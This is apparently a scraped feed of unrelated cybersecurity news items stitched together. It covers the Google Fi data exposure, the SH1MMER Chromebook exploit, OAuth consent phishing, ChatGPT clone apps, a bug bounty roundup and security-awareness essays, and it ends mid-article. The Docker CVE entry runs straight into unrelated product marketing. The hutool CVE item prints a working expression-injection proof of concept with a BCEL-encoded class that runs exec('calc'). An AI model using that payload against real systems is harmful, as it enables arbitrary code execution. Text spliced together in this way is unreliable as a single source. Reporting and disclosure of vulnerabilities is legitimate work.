Google Fi mobile customers have been alerted that their SIM card serial numbers, phone numbers, and other data were exposed in T-Mobile hack.

Google Fi has sent an email to customers to disclose that their account data was included in the more than 37 million customer records stolen from T-Mobile in November 2022.

Google Fi is a wireless plan that runs much of its service over T-Mobile networks.

Details on Google Fi customers, including phone number, SIM serial card number, and service plan details were among the stolen T-Mobile data. 

Google added in its email that the compromised information didn't contain "your name, date of birth, email address, payment card information, Social Security or tax IDs, driver's license or other form of government ID, or financial account information, passwords or PINs that you may use for Google Fi or the contents of any SMS messages or calls."

However, Lior Yaari, CEO and co-founder of Grip Security, noted that potential cyberattackers can still do a lot of damage via SIM-swapping, by having access to the users’ phone numbers and SIM serial card numbers.

"At minimum, affected customers should consider changing out their SIM card to protect themselves," he said via email. "Once the hackers take over your phone number, they can use it for illicit purposes, or even bypass two-factor authentication that uses SMS."

Google Fi has not noted how many customers are affected. 

"Given the serious nature and impact of the breach, it’s surprising that Google has not disclosed the number of customers impacted, like what we have seen in other major breaches," Yaari said. Google did not immediately return a request for comment.

The latest T-Mobile data breach marks the second in two years for the mobile carrier.

Google Fi Users Caught Up in T-Mobile Breach

A new exploit has been devised to "unenroll" enterprise- or school-managed Chromebooks from administrative control.
Enrolling ChromeOS devices makes it possible to enforce device policies as set by the organization via the Google Admin console, including the features that are available to users.
"Each enrolled device complies with the policies you set until you wipe or deprovision it," Google

A new exploit has been devised to "unenroll" enterprise- or school-managed Chromebooks from administrative control.

Enrolling ChromeOS devices makes it possible to enforce device policies as set by the organization via the Google Admin console, including the features that are available to users.

"Each enrolled device complies with the policies you set until you wipe or deprovision it," Google states in its documentation.

That's where the exploit – dubbed Shady Hacking 1nstrument Makes Machine Enrollment Retreat aka **SH1MMER** – comes in, allowing users to bypass these admin restrictions.

The method is also a reference to shim, a Return Merchandise Authorization (RMA) disk image used by service center technicians to reinstall the operating system and run diagnosis and repair programs.

The Google-signed shim image is a "combination of existing Chrome OS factory bundle components" – namely a release image, a toolkit, and the firmware, among others – that can be flashed to a USB drive.

A Chromebook can then be booted in developer mode with the drive image to invoke the recovery options. A shim image can either be universal or specific to a Chromebook board.

SH1MMER takes advantage of a modified RMA shim image to create a recovery media for the Chromebook and writes it to a USB stick. Doing so requires an online builder to download the patched version of the RMA shim with the exploit.

The next step entails launching the recovery mode on the Chromebook and plugging the USB stick containing the image into the device to display an altered recovery menu that enables users to completely unenroll the machine.

"It will now behave entirely as if it is a personal computer and no longer contain spyware or blocker extensions," the Mercury Workshop team, which came up with the exploit, said.

"RMA shims are a factory tool allowing certain authorization functions to be signed, but only the KERNEL partitions are checked for signatures by the firmware," the team further elaborated. "We can edit the other partitions to our will as long as we remove the forced readonly bit on them."

Additionally, the SH1MMER menu can be used to re-enroll the device, enable USB boot, open a bash shell, and even allow root-level access to the ChromeOS operating system.

The Hacker News has reached out to Google for comment, and we will update the story if we hear back.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New SH1MMER Exploit for Chromebook Unenrolls Managed ChromeOS Devices

Docker version 20.10.15, build fd82621 is vulnerable to Insecure Permissions. Unauthorized users outside the Docker container can access any files within the Docker container.

****Develop faster.** Run anywhere.**

The most-loved Tool in Stack Overflow’s 2022 Developer Survey.

 

Wasm is a new, fast, and light alternative to the Linux/Windows containers you’re using in Docker today — give it a try with the Docker+Wasm Beta.

Try it

**Accelerate how you build, share, and run modern applications.**

13 billion +  
monthly image downloads

**Docker makes development efficient and predictable**

Docker takes away repetitive, mundane configuration tasks and is used throughout the development lifecycle for fast, easy and portable application development – desktop and cloud. Docker’s comprehensive end to end platform includes UIs, CLIs, APIs and security that are engineered to work together across the entire application delivery lifecycle.

**Build**

*   Get a head start on your coding by leveraging Docker images to efficiently develop your own unique applications on Windows and Mac.  Create your multi-container application using Docker Compose.
*   Integrate with your favorite tools throughout your development pipeline – Docker works with all development tools you use including VS Code, CircleCI and GitHub.
*   Package applications as portable container images to run in any environment consistently from on-premises Kubernetes to AWS ECS, Azure ACI, Google GKE and more.

 

 

**Share**

*   Leverage Docker Trusted Content, including Docker Official Images and images from Docker Verified Publishers from the Docker Hub repository.
*   Innovate by collaborating with team members and other developers and by easily publishing images to Docker Hub.
*   Personalize developer access to images with roles based access control and get insights into activity history with Docker Hub Audit Logs.

**Run**

*   Deliver multiple applications hassle free and have them run the same way on all your environments including design, testing, staging and production – desktop or cloud-native.
*   Deploy your applications in separate containers independently and in different languages. Reduce the risk of conflict between languages, libraries or frameworks.
*   Speed development with the simplicity of Docker Compose CLI and with one command, launch your applications locally and on the cloud with AWS ECS and Azure ACI.

 

**New to containers?**

Today, all major cloud providers and leading open source serverless frameworks use our platform, and many are leveraging Docker for their container-native IaaS offerings.

**A Community like No Other**

Community is at the heart of what Docker does. From our Docker Captains sharing their insight and expertise, to hundreds of MeetUps around the world, to our Slack and Discourse forums for peer-to-peer support, there’s someone else out there who has been there, done that, and is eager to help.

**Use your favorite tools and images**

**Choose a subscription that is right for you**

Benefit from more collaboration, increased security, without limits… all enabled with a Docker subscription.

Check out our pricing.

**See who uses Docker**

**Go from code to cloud securely with partners that you trust**

Trust that your development pipeline workflow will work in any environment – locally and in the cloud.

 

Simplify the development of your multi-container applications from Docker CLI to Amazon ECS on AWS Fargate. 

Learn more

 

Seamlessly bring container applications from your local machine and run them in Azure container Instances.  

Learn more

 

Secure your containerized applications with vulnerability scanning and leverage trusted, certified images locally and in the cloud.

Learn more

 

Easily distribute and share Docker images with the JFrog Artifactory image repository and integrate all of your development tools.

Learn more

**Accelerate your application development today.**

CVE-2022-37708: Docker: Accelerated, Containerized Application Development

Everyone on Twitter wants a blue check mark. But Microsoft Azure's blue badges are even more valuable to a threat actor stealing your data via malicious OAuth apps.

Late last year, a group of threat actors managed to obtain "verified publisher" status through the Microsoft Cloud Partner Program (MCPP). This allowed them to surpass levels of brand impersonation ordinarily seen in phishing campaigns, as they distributed malicious applications bolstered by a verified blue badge only ever given to trusted vendors and service providers in the Microsoft ecosystem.

The MCPP is Microsoft’s channel partner program, inhabited by 400,000-plus companies that sell and support its enterprise products and services and also build their own solutions and software around them. Members include managed services providers, independent software vendors, and business app developers, among others.

Researchers from Proofpoint first discovered this activity on Dec. 6 of last year. A report published on Jan. 31 outlines how threat actors used their bogus status as verified app publishers within the MCPP program to infiltrate UK- and Ireland-based organizations' cloud environments. The fake solutions partners targeted employees in finance and marketing, as well as managers and executives, via malicious applications. Users who fell for the badge potentially exposed themselves to account takeover, data exfiltration, and business email compromise (BEC), and their organizations were laid open to brand impersonation.

Overall, the campaign "used unprecedented sophistication to bypass Microsoft’s security mechanisms," the researchers tell Dark Reading. "This was an extremely well-thought-out operation."

**How the Hackers Duped Microsoft**

To become a verified publisher, Microsoft Cloud Partners must meet a set of eight criteria. These criteria are largely technical and, as Microsoft outlined in its documentation, passing the bar "doesn't imply or indicate quality criteria you might look for in an app." But threat actors abusing the system to distribute malicious apps? That's not supposed to happen.

The trick in this case was that, before phishing end users, the attackers tricked Microsoft itself.

To wit: They registered as publishers under "displayed" names that mimicked legitimate companies. Meanwhile, their associated "verified publisher" names were hidden and slightly different. The example given by the researchers is that a publisher masquerading as "Acme LLC" might have a verified publisher name "Acme Holdings LLC."

Evidently, this was enough to skate by the systems' verification process. In fact, researchers noted, "in two cases, the verification was granted one day after the creation of the malicious application."

When reached for comment on the failure of the verification process, Proofpoint did not offer further details, and a Microsoft spokesperson merely noted, _“_Consent phishing is an ongoing, industrywide issue, and we’re continuously monitoring for new attack patterns. We've disabled these malicious apps and are taking additional steps to harden our services to help keep customers secure.” 

The spokesperson added, "The limited number of customers who were impacted by the campaign described in the Proofpoint blog have been notified."

**How the Hackers Duped Enterprise Users**

Having obtained their verified status, the threat actors began spreading malicious OAuth apps, an increasingly popular vehicle for cyberattackers in recent years. They rigged these apps to request broad access to victims' accounts.

"The actor used fraudulent partner accounts to add a verified publisher to OAuth app registrations they created in Azure AD," according to an advisory published Jan. 31. "The applications created by these fraudulent actors were then used in a consent phishing campaign, which tricked users into granting permissions to the fraudulent apps."

OAuth — short for "open authorization" — is a token-based framework that enables users to authorize certain data sharing between third-party applications, without needing to divulge their login credentials in the process. A common example is the "log in with Google" or "log in with Facebook" options that many websites offer to avoid having to create a new set of credentials to use with the sites. OAuth dialogues are common enough that users typically just hit "Accept," without digging into the fine details of what they're agreeing to.

Snuffing out this consent phishing campaign would have required a great deal more vigilance than that.

Beyond the "verified publisher" stamp of approval, the attackers gave vague and innocuous names to the apps requesting permissions: Two were called, simply, "Single Sign-on (SSO)," and one "Meeting." And though publishing under the guise of other impersonated organizations, the attackers chose a household name to display to users at the requested permissions stage.

"The attacker(s) used different data fields to fool targeted users," the Proofpoint researchers said. "They used one name, identical to the impersonated org's name, as the visible publisher name. The other name was used as a hidden parameter, not visible in the malicious app's consent page."

In one case, "they used an outdated version of the well-recognized Zoom icon," the Proofpoint authors explained in the report, "and redirected to Zoom-resembling URLs, as well as a genuine Zoom domain, to increase their credibility."

To conclude, they put it bluntly: "End users are likely to fall prey to the advanced social engineering methods outlined in this blog."

Victims who fell for the gambit granted their attackers permission to access special areas of their accounts, like their mailboxes and calendars. The permissions also included offline access, enabling the hackers to do what they wished entirely out of view.

**Bogus OAuth Apps: Takeaways for Business**

After learning about the campaign on Dec. 15, Microsoft disabled the malicious applications and associated publisher accounts. It then enlisted its Digital Crimes Unit to investigate further.

According to Microsoft, "We have implemented several additional security measures to improve the MCPP vetting process and decrease the risk of similar fraudulent behavior in the future."

To defend against future campaigns of this kind, Proofpoint researchers recommended deploying effective cloud security solutions to help detect malicious applications, and pointed readers to Microsoft's advisory regarding consent phishing. Their most important bit of advice was "to exercise caution when granting access to third-party OAuth apps, even if they are verified by Microsoft."

"Do not," they wrote, "trust and rely on OAuth apps based on their verified publisher status alone."

Phishers Trick Microsoft Into Granting Them 'Verified' Cloud Partner Status

By Waqas
Several fake ChatGPT clone apps have surfaced on the official iOS and Play Stores, collecting user data and sending it to remote servers.
This is a post from HackRead.com Read the original post: ChatGPT Clone Apps Collecting Personal Data on iOS, Play Store

On Android devices, one of the apps analyzed by researchers has more than 100,000 downloads, tracks, and shares location data with ByteDance and Amazon, etc.

ChatGPT, the AI software, has already taken the Internet by storm, and that is why cybercriminals are looking to exploit the opportunity for malicious purposes. But the bigger question is, does ChatGPT have official apps for iOS or Play Store? Short answer: No, but we asked ChatGPT about it.

For your information, Chat Generative Pre-Trained Transformer, aka **ChatGPT**, is a chatbot launched in November 2022 by OpenAI. It is part of OpenAI’s GPT-3 family of language models and is compatible with both reinforcement and supervised learning techniques.

According to Top10VPN, unofficial clones and fake apps of the ChatGPT chatbot are available on both the Apple App Store and Google Play Store when they search for the term “ChatGPT.”

The researchers analyzed the ten highest-ranking apps, most of which relied on the new ChatGPT-3 technology. They used open-source tools, such as **mitmproxy**, to examine network traffic in their testing environment and detect risky functionalities in the Android apps’ code.

Moreover, they also analyzed the clone apps’ privacy policies and store pages to understand each app’s data collection and sharing policies.

**_MORE Chatgpt NEWS_**

1.  **OpenAI’s ChatGPT Can Create Polymorphic Malware**
2.  **Hackers Want to abuse ChatGPT by Bypass Restrictions**
3.  **Hackers Exploiting OpenAI’s ChatGPT to Deploy Malware**

**Collecting Android Data**

On Android devices, two clone apps collect/share users’ IP addresses with 3rd parties, whereas one app, identified as ChatGPT AI Writing Assistant with more than 100,000 downloads, tracks/shares location data with ByteDance and Amazon, etc.

Three of these apps ask for permissions that compromise users’ privacy, including recording audio permission, even though in-app speech functions are unavailable.

Moreover, all clone apps feature code with privacy impacts and lack the relevant permissions, including access to location, camera, photos, videos, and read/write storage.

Furthermore, nine apps exploit OpenAI’s GPT-3 technology, which is currently free, and three apps charge for access. One of the apps offers an ad-free tier. The list of malicious Android apps shared by Top10VPN includes the following:

*   AI Chat Companion
*   ChatGPT 3: Chat GPT AI
*   Open AI Chat Gpt – AI 360
*   TalkGPT – Talk to ChatGPT
*   Open Chat – AI Chatbot App
*   ChatGPT AI Writing Assistant

The full list with in-depth details of how and which data these apps collect is **available here**.

**Collecting iOS data**

On iOS devices, the ten top-ranked clone apps collected shared data with inadequate privacy protections. Two apps logged Q&A content, and five allowed third-party trackers to fingerprint devices.

An app called Alfred – Chat with GPT 3 involved in collecting device info (Top10VPN)

According to Top10VPN’s **report**, more than 300 server requests were launched within four minutes by one app. Seven apps did not follow the data collection practices according to their official privacy labels. Nine apps exploited OpenAI’s GPT-3 technology, and eight apps charged up to $15,000 per year for access.

The list of malicious iOS apps shared by Top10VPN includes the following:

*   Open Chat – AI Chatbot
*   Alfred – Chat with GPT 3
*   Genie – GPT AI Assistant
*   TalkGPT – Talk to ChatGPT
*   Chat AI: Personal AI Assistant
*   Write For Me GPT AI Assistant
*   Wisdom Ai – Your AI Assistant

The full list with in-depth details of how and which data these apps collect is **available here**.

**How do These Apps Threaten User Privacy?**

All the top-ten ChatGPT apps in the **Google Play Store** collected shared data with poor privacy protections. The apps shared numerous data points about user devices, such as screen size or network operator.

This may appear harmless on its own, but it can be used for fingerprint devices. Though none of these apps have malicious tendencies, one app was found to be sharing data with ByteDance.

Similarly, many apps are charging the user to access an available free app, which raises ethical concerns. Regarding user data privacy, TalkGPT was the most offensive of all apps, as it tracks users’ precise location data and transfers it to ByteDance, Amazon, Appodeal, AdTech, and InMobi.

It also seeks permission to record audio and collects users’ IP addresses and device fingerprints, which it shares with five third parties, including AdColony, Facebook, Criteo, Everest Technologies, and Google.

In addition, many clone apps mine the personal data of ChatGPT’s userbase, which had exceeded one million users in less than a week of its launch.

1.  **Avast anti-virus acknowledges collecting user data**
2.  **Data Collection Costs Epic Games Half a Billion USD**
3.  **Top 10 Android Ed Apps That Collect Most User Data**
4.  **Android sends more data to Google than iOS to Apple**
5.  **How data collected in gaming can breach user privacy**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

ChatGPT Clone Apps Collecting Personal Data on iOS, Play Store

SQL Inection vulnerability in Dromara hutool v5.8.11 allows attacker to execute arbitrary code via the aviator template engine.

**描述**

根据 _**官方文档**_ 提供的示例，使用 _**Aviator**_ 模板引擎，当解析不受信任表达式字符串时，可能容易受到代码执行攻击，尽管使用是 _**Aviator**_ 当前最新的版本(_**5.3.3**_)依然会受影响。

**示例**

    String exp = "'a'+(c=Class.forName(\"$$BCEL$$$l$8b$I$A$A$A$A$A$A$AeP$cbN$c2$40$U$3dCK$5bk$95$97$f8$7e$c4$95$c0$c2$s$c6$j$c6$NjbR$c5$88a_$ca$E$86$40k$da$c1$f0Y$baQ$e3$c2$P$f0$a3$8cw$w$B$a2M$e6$de9$e7$9es$e6$a6_$df$l$9f$ANq$60$p$8b$b2$8dul$a8$b2ib$cb$c46$83q$sB$n$cf$Z$b4J$b5$cd$a07$a2$$g$c8y$o$e4$b7$e3Q$87$c7$P$7egHL$d1$8b$C$7f$d8$f6c$a1$f0$94$d4e_$q$MY$afqsQ$t$c8$t$3c$608$aax$D$ff$c9w$87$7e$d8s$5b2$Wa$af$5e$5d$a0$ee$e2$u$e0IB$G$z$YuU$f4$3f9$83$7d9$J$f8$a3$UQ$98$98$d8$n$dc$8a$c6q$c0$af$84z$d7$a2$f7$8e$95$c9$81$B$d3$c4$ae$83$3d$ec$3bX$c1$w$85$d2$90$n$3f$cflv$G$3c$90$M$a5$94$S$91$7b$dd$9c$853$U$e6$c2$fbq$u$c5$88$f2$ed$k$973P$ae$y$$$3f$a5$eb8$84N$7fT$7d$Z0$b5$GU$8b$90K$9dQ$cf$d6$de$c0$5e$d2$f1$SU$p$r5$d8T$9d_$B$96$e9$G$9a$d2$da$a4R$e6$934$M$b0$de$91$a9$bdB$7b$fe$e37$W$fc$Wr$c8S$_$d0$d1$89$v$d2$v$a5$fa$b5$l$d5$l$f2$9c$f6$B$A$A\",true,new com.sun.org.apache.bcel.internal.util.ClassLoader()) ) + ( c.exec(\"calc\") );";
    final Object eval = ExpressionUtil.eval(exp, null);
    

**Reference**

1.  https://github.com/killme2008/aviatorscript/issues/421
2.  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41862
3.  https://mvnrepository.com/artifact/com.googlecode.aviator/aviator

CVE-2023-24163: ExpressionUtil 表达式注入 · Issue #I6AJWJ · dromara/hutool - Gitee.com

New web targets for the discerning hacker

Adam Bannister 31 January 2023 at 15:13 UTC  
Updated: 31 January 2023 at 15:23 UTC

New web targets for the discerning hacker

A bypass of Facebook’s SMS-based two-factor authentication (2FA) made it into Meta’s most impressive bug bounty finds of 2022.

However, it seems Facebook’s parent company initially didn’t fully appreciate the vulnerability, offering a $3,000 bounty before eventually revising the reward upwards to $27,200.

“Since there was no rate limit protection at all while verifying any contact points – email or phone – an attacker just knowing the phone number could add the victim’s 2FA-enabled phone number in his or her Instagram-linked Facebook account,” security researcher Manoj Gautam told The Daily Swig.

In other bug bounty news this month, a hacker duo documented Google Cloud Platform (GCP) research that resulted in six payouts totalling more than $22,000.

The most lucrative find for Sreeram KL and Sivanesh Ashok led to a double $5,000 reward for a server-side request forgery (SSRF) bug and subsequent patch bypass in machine learning platform Vertex AI.

Outlined across four blog posts, their bug bounty exploits also included an SSH key injection issue in Google Cloud’s Compute Engine and flaws in Theia and Cloud Workstations.

Cross-origin resource sharing (CORS) misconfigurations were the focus of a third bug bounty writeup covered by The Daily Swig this month.

Exploits fashioned for multiple private programs – notably including Tesla – earned Truffle Security researchers a “few thousand dollars” and vindicated their hypothesis that “large internal corporate networks are exceedingly likely to have impactful CORS \[cross-origin resource sharing\] misconfigurations”.

Fresh hacking opportunities on the horizon, meanwhile, include The US Department of Defense (DoD)’s third annual Hack The Pentagon challenge and the Zero Day Initiative’s (ZDI’s) inaugural Pwn2Own Automotive, slated for January 2024.

**The latest bug bounty programs for February 2023**

The past month saw the arrival of several new bug bounty programs. Here’s a list of the latest entries:

**8x8**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$1,337

**Outline:  
**The US provider of business communication technologies has invited hackers to probe its websites, mobile apps, and services such as Jitsi, its open source video meeting software.

**Notes:  
**Despite the relatively modest top bounty on offer, 8x8 has already paid out more than $90,000 in bounties within a month of its launch.

Check out the 8x8 bug bounty page for more details

**Hedera Hashgraph**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$30,000

**Outline:  
**Hedera Hashgraph describes itself as “a responsibly governed decentralized network”, with the Hedera Governing Council comprising “enterprises, web3 projects, and prestigious universities”.

**Notes:  
**There are seven assets in scope including services and mirror node codebases, Java and JavaScript SDKs, testnet API endpoints, and testnet mirror node APIs.

Check out the Hedera Hashgraph bug bounty page for more details

**Hyperlane**

**Program provider:  
**Immunefi

**Program type:  
**Public

**Max reward:  
**$2.5 million

**Outline:  
**Hyperlane describes itself as a modular interoperability platform, empowering developers to build interchain applications, apps that can easily and securely communicate between blockchains.

**Notes:  
**The life-changing maximum reward is on offer for critical bugs on smart contracts, whereas application flaws can command payouts of up to $20,000.

Check out the Hyperlane bug bounty page for more details

**Kiwi.com**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$5,000

**Outline:  
**Czech online travel agency Kiwi.com provides a fare aggregator, metasearch engine, and booking function for airline tickets and ground transportation.

**Notes:  
**In-scope targets include the main website, kiwi.com; tequila.kiwi.com; jobs.kiwi.com; source code; APIs and internal tools; and mobile applications.

Check out the Kiwi.com bug bounty page for more details

**Net+**

**Program provider:  
**GObugfree

**Program type:  
**Mix of public and private

**Max reward:  
**CHF5,000 ($5,389)

**Outline:  
**Netplus.ch, which provides internet, telephony, and TV services to more than 220,000 users in Switzerland, is paying between CHF 2,000-5,000 for critical bugs.

**Notes:  
**New targets are initially restricted to the private program for a period of initial testing, before being opened up to the broader hacking community within the public program.

Check out the Net+ private and public bug bounty pages for more details

**Open-Xchange (OX) App Suite**

**Program provider:  
**YesWeHack

**Program type:  
**Public

**Max reward:  
**€5,000 ($5,430)

**Outline:  
**Open-Xchange’s OX App Suite is an open source email and productivity suite that purports to favor security by default rather than security through obscurity.

**Notes:  
**Open-Xchange, hitherto a HackerOne client, has migrated its bug bounty programs to YesWeHack. CISO Martin Heiland recently discussed the hacking opportunities on offer with the Paris-based platform.

Check out the OX App Suite bug bounty page for more details

**Open-Xchange Dovecot**

**Program provider:  
**YesWeHack

**Program type:  
**Public

**Max reward:  
**€5,000 ($5,430)

**Outline:  
**Dovecot is Open-Xchange’s IMAP, POP3, and submission server for email, used within multiple operating systems and by “millions of operators”.

**Notes:  
**Open-Xchange, hitherto a HackerOne client, has migrated its bug bounty programs to YesWeHack. CISO Martin Heiland recently discussed the hacking opportunities on offer with the Paris-based platform.

Check out the Dovecot bug bounty page for more details

**Open-Xchange PowerDNS**

**Program provider:  
**YesWeHack

**Program type:  
**Public

**Max reward:  
**€5,000 ($5,430)

**Outline:  
**PowerDNS is a DNS server that enables domain resolution and network security features.

**Notes:  
**Open-Xchange, hitherto a HackerOne client, has migrated its bug bounty programs to YesWeHack. CISO Martin Heiland recently discussed the hacking opportunities on offer with the Paris-based platform.

Check out the PowerDNS bug bounty page for more details

**S-Pankki**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$4,000

**Outline:  
**The Finnish bank is offering up to $4,000 for critical vulnerabilities, $2,000 for high severity flaws, and $1,000 for medium severity bugs.

**Notes:  
**There are 11 assets in scope, including nine domains plus iOS and Android mobile applications.

Check out the S-Pankki bug bounty page for more details

**Superbet**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$2,000

**Outline:  
**The Romanian online gaming company is offering a maximum of $2,000 for critical bugs, $1,000 for high severity issues, and $250 for medium impact vulnerabilities.

**Notes:  
**Just the one asset in scope: the.superbet.ro domain.

Check out the Superbet bug bounty page for more details

**Swiss Bankers**

**Program provider:  
**GObugfree

**Program type:  
**Private

**Max reward:  
**Undisclosed

**Outline:  
**Swiss Bankers is a financial services firm specializing in prepaid credit cards, mobile payment, and money transfer.

**Notes:  
**Hackers can participate by invitation only.

Check out the Swiss Bankers bug bounty page for more details

**Threema (Enhanced)**

**Program provider:  
**GObugfree

**Program type:  
**Public

**Max reward:  
**CHF10,000 ($10,778)

**Outline:  
**Swiss instant messenger service Threema has upped maximum payouts from CHF4,000 ($4,311) To CHF10,000 ($10,778) after launching the program in May 2022.

**Notes:  
**This news comes after the privacy-focused software disputed claims that there were several security flaws in its encrypted messaging platform.

Check out the Threema bug bounty page for more details

**TRON DAO**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$5,000

**Outline:  
**TRON DAO is an open source platform for creating decentralized applications, new financial primitives, and interoperable blockchains.

**Notes:  
**TRON’s Java source code is currently the sole asset in scope.

Check out the TRON DAO bug bounty page for more details

**Wato-soft**

**Program provider:  
**GObugfree

**Program type:  
**Private

**Max reward:  
**Undisclosed

**Outline:  
**Swiss IT services firm specializing in Enterprise resource planning (ERP) software.

**Notes:  
**Hackers can participate by invitation only.

Check out the Wato-Soft bug bounty page for more details

**Other bug bounty and VDP news this month**

*   An Amazon virtual hacking event with HackerOne was the platform’s highest paying virtual event ever, with more than 50 security researchers collectively earning $832,135. The 10-day hackathon’s overall winner was @jonathanbouman, while ‘Best Team Collaboration’ went to ‘spacebaffoons’ @the\_arch\_angel, @spaceraccoon, and (one time Daily Swig interviewee) @ajxchapman
*   As referenced in our latest Deserialized roundup, Intigriti has flagged a Belgium-wide safe harbor clause in the country’s proposed whistleblower law, and a New Scientist feature on a mathematical means of demonstrating valid exploits without risking public disclosure
*   Finally, YesWeHack has penned a how-to on using Burp Suite extension Highlighter And Extractor (HaE) to surface vulnerabilities via regular expressions

PREVIOUS EDITION Bug Bounty Radar // The latest bug bounty programs for January 2023

Bug Bounty Radar // The latest bug bounty programs for February 2023

Three mindset shifts will help employees build a habit of vigilance and make better security decisions. Move past security theater to reframe thinking so employees understand data's value, act with intention, and follow data best practices.

A confused marketing team member nervously buys $1,000 worth of Amazon gift cards after receiving purchasing instructions via text from the "boss." The entire sales team mindlessly accepts cookies while visiting competitor websites and skips through privacy disclosures when downloading new apps to gather business intel. Your phone vibrates, and it's a client. They're demanding to know why sensitive customer information is in an unsecured Google Doc.

These panic-inducing scenarios are familiar to most modern IT and security leaders and share something in common. Each hypothetical breakdown is the result of employees — and the digital public as a whole — being lulled into a false sense of security regarding their online behaviors.

While IT and security leaders are aware of the accelerating landscape of digital threats, employees are less prepared, creating a risk for every organization.

**Security Theater Distracts From Steady Improvements**

We've seen the introduction of major privacy legislation to curb the rise in digital threats, which I fully support. However, sweeping laws like GDPR and regulations established stateside have had an effect or outcome more as security theater than as actual protections.

What's security theater? It's a set of rules or guidelines that offer the appearance of security but don't guarantee it. Users aren't blameless, either. Security theater can also occur when consumers grow apathetic about well-intentioned protections. For example, while cookie notifications demonstrate transparency about how and where websites track and use customer data, does anyone read the full privacy statements? Do users understand the consequences of what they click? Or are they too inundated with notifications to notice?

Until digital literacy and safety standards become mandatory in school curricula, the best way to ensure your employees are well-versed in the risks of their online actions is reframing thinking through improved security training and education.

As a technology leader, you know each employee is an endpoint capable of inviting risk into the organization. But that also means employees can become safeguards against threats, too — when adequately prepared and in the right headspace.

**Remove the Smoke and Mirrors**

In addition to mandatory and routine training and security tools, the best way to ensure employees are vigilant about potential risks is to help them reframe their online mindset while encouraging them to leverage critical thinking in evaluating and defending against internal and external threats. Helping employees develop a healthier understanding of what's at stake when they engage online — and the value of the information they interact with once there — can strengthen digital habits and build more mindful, proactive thinking when faced with a threat or even before one occurs.

Here are three mindset shifts to start with:

1.  **Understand data's fundamental value.** Employees — and most online consumers — don't give much thought before hitting "accept all" when encountering cookies. Similarly, users skim or even skip privacy notices on apps or when signing up for services. These behaviors can feel perfunctory because these types of security notifications are nonstop when we engage online — and because "accepting" doesn't often seem like the value exchange that it is. If you can help employees understand the value of their data, they're more likely to realize how precious every online decision is and think more critically before clicking and accepting. Considering that one in three US workers has little to no skills using digital devices, a significant missing component to more robust security is workplace digital literacy training that focuses on the specific threats faced by your organization and industry. 
2.  **Act with intention.** When people realize the value of their data, they're more vigilant and protective of it. But your employees should also feel encouraged to proactively ask questions about risks and formulate better ways to protect themselves. For example, your teams should have access to and familiarity with a standardized communication plan for when they receive phishing texts or emails. Instead of simply deleting these threats, all employees should screenshot communications, forward images to the department in charge of security, and immediately alert fellow team members of the text. A discerning eye for security threats is only the first step — next, your employees should feel prepared to handle suspicious activity when encountered.
3.  **Follow data best practices, no matter the context.** It's important to determine if your employees understand that customer data is sacred no matter how far removed from your actual clients. A good example of this concept comes from where I sit in legal tech. Our law firm customers deal daily with topics including divorce, bankruptcy, complex real-estate purchases, and more with their clients. Naturally, these legal proceedings cover a tremendous amount of personal, sensitive data stored on our platform. We take the protection of this information extremely seriously, knowing that a breach of this information cannot be undone and may ruin lives, and we work to improve our protective mechanisms. Protection against threats takes a team effort. As a result, we encourage our law firm clients to ensure that all their employees understand their role in protecting private information. We inform customers of security best practices — like using a password manager and enabling two-factor authentication, avoiding sending or sharing documents from unsecured accounts or devices, and putting contingency plans in place if sensitive client information is accidentally shared.

When employees understand how their day-to-day behaviors — no matter how small — can expose sensitive data, they're less likely to introduce risk in the first place. While you strive to train employees on how to protect data in every scenario, building a habit of vigilance reduces the amount of reactive problem-solving required in the first place.

Improving your employees' fundamental understanding and respect for the value of data shields your organization from digital threats. But without reinforcing this understanding through ongoing mindset shifts, the status quo and security theater of repetitive privacy notifications will make employees feel more complacent. With complacency comes risk — so, are your employees thinking critically about their online behaviors?

And are you thinking critically about it, too?

Are Your Employees Thinking Critically About Their Online Behaviors?

Do you know where your secrets are? If not, I can tell you: you are not alone.
Hundreds of CISOs, CSOs, and security leaders, whether from small or large companies, don't know either. No matter the organization's size, the certifications, tools, people, and processes: secrets are not visible in 99% of cases.
It might sound ridiculous at first: keeping secrets is an obvious first thought when

Do you know where your secrets are? If not, I can tell you: you are not alone.

Hundreds of CISOs, CSOs, and security leaders, whether from small or large companies, don't know either. No matter the organization's size, the certifications, tools, people, and processes: secrets are not visible in 99% of cases.

It might sound ridiculous at first: keeping secrets is an obvious first thought when thinking about security in the development lifecycle. Whether in the cloud or on-premise, you know that your secrets are safely stored behind hard gates that few people can access. It is not just a matter of common sense since it's also an essential compliance requirement for security audits and certifications.

Developers working in your organization are well-aware that secrets should be handled with special care. They have put in place specific tools and procedures to correctly create, communicate, and rotate human or machine credentials.

Still, do you know where your secrets are?

Secrets sprawl everywhere in your systems, and faster than most realize. Secrets are copied and pasted into configuration files, scripts, source code, or private messages without much thought. Think about it: a developer hard-codes an API key to test a program quickly and accidentally commits and pushes their work on a remote repository. Are you confident that the incident can be detected in a timely manner?

Insufficient audit and remediation capabilities are some of the reasons why secrets management is hard. They are also the least addressed by security frameworks. Yet these grey areas—where unseen vulnerabilities remain hidden for a long time—are blatant holes in your defense layers.

Recognizing this gap, we developed a self-assessment tool to evaluate the size of this unknown. To take stock of your _real_ security posture regarding secrets in your organization, take five minutes to answer the eight questions (it's completely anonymous).

So, how much do you _not_ know about your secrets?

**Secrets Management Maturity Model**

Sound secrets management is a crucial defensive tactic that requires some thought to build a comprehensive security posture. We built a framework (you can find the white paper here) to help security leaders make sense of their actual posture and adopt more mature enterprise secrets management practices in three phases:

1.  Assessing secrets leakage risks
2.  Establishing modern secrets management workflows
3.  Creating a roadmap to improvement in fragile areas

The fundamental point addressed by this model is that secrets management goes well beyond how the organization stores and distributes secrets. It is a program that not needs to align people, tools, and processes, but also to account for human error. Errors are _not_ evitable! Their consequences are. That's why detection and remediation tools and policies, along with secrets storage and distribution, form the pillars of our maturity model.

The secrets management maturity model considers four attack surfaces of the DevOps lifecycle:

*   Developer environments
*   Source code repositories
